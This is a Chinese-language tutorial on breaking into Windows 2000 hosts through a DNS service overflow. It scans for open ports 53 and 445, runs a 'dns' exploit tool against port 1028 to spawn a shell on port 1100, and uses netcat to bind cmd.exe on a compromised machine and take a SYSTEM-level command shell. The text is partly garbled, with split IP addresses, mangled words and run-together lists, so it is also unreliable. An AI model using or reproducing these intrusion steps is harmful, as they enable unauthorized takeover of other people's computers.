文本内容:
教你如何DNS溢出漏洞入侵网站平安电脑资料前提是必须要开放
53、445端口
1、选择superscan进行扫描,在端口列表中勾选上
53、445端口,然后选择主机段进行扫描,
2、选择存在
53、445端口的主机,在cmd下输入dns-tip对主机进行特定漏洞端口扫描,“1028Vulnerability”表示1028端口存在溢出漏洞,“os:window2000”表示系统类型为window
20003、在执行dns-t2000allip1028对目标主机进行溢出connectiontotargethosttcpportestablished成功连接到主机的tcp端口上,suessfullyboundtothevulneraledcerpcinterface已经连接到对方的rpc端口上,osfingerprintresult:windows2000系统指纹对方是wind2000系统,attacksentcheckport1100攻击代码已经成功发送,并尝试连接1100端口当出现最后这一句提示语句的时候就意味着我们要成功了
4、怎么连接对方的1100端口呢,当然我们要使用nc了,
5、nc全称叫cat,这是一个非常简单易用的基于tcp/ip协议(c/s模型的)的“瑞士军刀”下面介绍一下它的几个常用功能
1、nc.exe-vv-l-p6069,表示在本地6069端口上进行监听-vv显示详细的信息-l:进行监听,监听入站信息-p监听所使用的端口号
2、正如我们遇到的情况,对方已经开放了一个端口他在等待我们连接哦,连接上去会有什么呢?当然是system权限的shell了nc.exe-vv
127.
0.
0.15257,连接ip为
127.
0.
0.1的5257端口
3、还可以在本地监听端口的同时绑定shell,就相当于一个tel效劳端通常这个命令在肉鸡上执行,然后当我们连接上去就可以获得这个shell了nc.exe-l-p5257-t-ecmd.exe,在本机5257端口上监听并绑定cmd.exe-e作用就是程序定向-t以tel的形式来应答
4、它可以用来手动对主机提交数据包(通常为80)端口,nc.exe-vv
127.
0.
0.180的内容
6、介绍完nc.exe的四种常用方式,现在知道如何使用nc来链接对方的1100端口了吧,我们使用nc-vv
127.
0.
0.11100连接对方的1100端口,成功获得了一个具有system权限的cmdshell,现在想干什么就干什么了模板内容仅供参考 。